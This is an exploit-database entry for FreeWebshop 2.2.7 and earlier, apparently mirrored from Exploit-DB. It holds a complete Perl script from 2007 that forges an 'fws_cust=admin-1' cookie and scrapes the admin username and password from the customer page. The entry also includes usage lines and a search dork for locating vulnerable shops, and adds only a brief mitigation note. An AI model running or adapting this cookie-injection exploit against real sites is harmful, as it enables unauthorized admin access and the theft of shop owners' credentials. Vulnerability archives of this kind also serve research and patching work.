FreeWebshop - exploit.company

vendor:

FreeWebshop

by:

k1tk4t

7.5

CVSS

HIGH

Cookie Injection

352

CWE

Product Name: FreeWebshop

Affected Version From: <= 2.2.7

Affected Version To: <= 2.2.7

Patch Exists: NO

Related CWE:

CPE: a:freewebshop:freewebshop:2.2.7

Metasploit:

Other Scripts:

Platforms Tested:

2007

FreeWebshop <= 2.2.7 - (cookie) Admin Password Grabber Exploit

This exploit allows an attacker to grab the admin username and password from FreeWebshop version 2.2.7 or below. The attacker needs to provide the target URL and path as command line arguments. The exploit uses LWP::UserAgent and HTTP::Cookies modules to inject a cookie and retrieve the admin credentials.

Mitigation:

Upgrade to a newer version of FreeWebshop that has fixed this vulnerability. Ensure that input validation and sanitization is implemented to prevent cookie injection attacks.

Source

Exploit-DB raw data:

#!/usr/bin/perl
#
# Indonesian Newhack Security Advisory
# ------------------------------------
# FreeWebshop <= 2.2.7 - (cookie) Admin Password Grabber Exploit
# Waktu			:  Dec 17 2007 04:50AM
# Software		:  FreeWebshop <= 2.2.7
# Vendor		:  http://www.freewebshop.org/
# Demo Site		:  http://www.freewebshop.org/demo/
# Ditemukan oleh	:  k1tk4t  |  http://newhack.org
# Lokasi		:  Indonesia
# Dork			:  "Powered by FreeWebshop"
#
# Terima Kasih untuk;
# -[opt1lc, fl3xu5, ghoz]-
# str0ke, DNX, xoron, cyb3rh3b, K-159, the_hydra, y3dips
# nyubi,iFX,sin~X,kin9k0ng,bius,selikoer,aldy_BT
# Komunitas Security dan Hacker Indonesia
#
# ----------------------------[Cookie Injection]------------------------------------
use LWP::UserAgent;
use HTTP::Cookies;

if(!$ARGV[1])
{
 print "\n  |-------------------------------------------------|";
 print "\n  |         Indonesian Newhack Technology           |";
 print "\n  |-------------------------------------------------|";
 print "\n  |FreeWebshop 2.2.7 (cookie) Admin Password Grabber|";
 print "\n  |     Found by k1tk4t [k1tk4t(at)newhack.org]     |";
 print "\n  |-------------------------------------------------|";
 print "\n[!] ";
 print "\n[!] Penggunaan : perl freewebshop227.pl [URL] [Path] ";
 print "\n[!] Contoh     : perl freewebshop227.pl http://korban.site /WebShop/";
 print "\n[!] ";
 print "\n";
 exit;
}

my $site = $ARGV[0]; # Site Target
my $path = $ARGV[1]; # Path direktori envolution_1-0-1

my $www = new LWP::UserAgent;
#my @cookie = ('Cookie' => "cookie_info=admin-1"); #Untuk Versi < = 2.2.4
my @cookie = ('Cookie' => "fws_cust=admin-1"); #Untuk Versi > = 2.2.6
my $http = "$site/$path/index.php?page=customer&action=show";
print "\n\n [~] Sedang Mencari Username dan Password.... \n";
my $injek = $www -> get($http, @cookie);
my $jawaban = $injek -> content;
if( $jawaban =~ /login value='(.*)'/ ){ print "\n [+] Username: $1"; 
$jawaban =~ /"password" name="pass1" size="10" maxlength="10" value="(.*)"/ , print "\n [+] Password: $1 \n";} 
else {print "\n [-] Gagal  :(  , Coba yang lain!";}

# ----------------------------[Selesai]------------------------------------

# milw0rm.com [2007-12-18]